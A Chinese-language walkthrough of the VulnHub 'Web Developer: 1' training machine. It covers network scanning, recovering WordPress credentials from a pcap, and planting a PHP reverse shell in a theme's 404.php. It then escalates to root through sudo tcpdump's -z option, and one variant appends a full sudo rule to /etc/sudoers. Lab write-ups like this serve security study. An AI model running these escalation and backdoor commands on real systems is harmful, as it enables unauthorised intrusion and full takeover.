本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

地址:​​https://www.vulnhub.com/entry/web-developer-1,288/​​​

nmap -n -p- -A -sC -sV -sS -o webdeveloper.nmap 192.168.226.131 -o webdevelop.nmap

nmap扫描结果

Vulnhub-靶机-WEB DEVELOPER: 1_post请求

就开放了两个端口22和80,常规套路访问下80端口

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_02

看到WordPress字样,猜测是WordPress博客程序,使用dirb爆破下目录

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_03

根据爆破目录的结果,看到如下信息

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_04

下载此文件然后使用wireshark打开,过滤下http的数据包信息,然后看请求的URL和POST请求,一个个向下拉,到180这个位置找到了POST请求,发现了登录的账号和密码

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_05

webdeveloper
Te5eQg&4sBS!Yr$)wf%(DcAd

登录到WordPress后台之后找到404.php文件上传了php反弹shell,访问:http://192.168.226.131/wp-content/themes/twentysixteen/404.php 最终成功反弹shell

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_06

想变成tty-shell,但是发现没有Python,搞不了,那么找找配置文件试试运气

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_07

发现了数据库的用户名和密码,那么试试是否能够登录ssh

webdeveloper
MasterOfTheUniverse

Vulnhub-靶机-WEB DEVELOPER: 1_php_08

成功登录,因为知道密码,就看看sudo -l,发现如下信息

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_09

可以通过tcpdump提权了,这个前面演示的靶机也有提到过

Vulnhub-靶机-WEB DEVELOPER: 1_技术交流_10

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.bmfx
chmod +x /tmp/.bmfx
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_11

成功提权rootshell

=====================================================================================================================================================================

另一种提权思路

echo 'echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/.bmfx
chmod +x /tmp/.bmfx
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.bmfx -Z root

Vulnhub-靶机-WEB DEVELOPER: 1_post请求_12

Vulnhub-靶机-WEB DEVELOPER: 1_技术交流_13

 

迷茫的人生,需要不断努力,才能看清远方模糊的志向!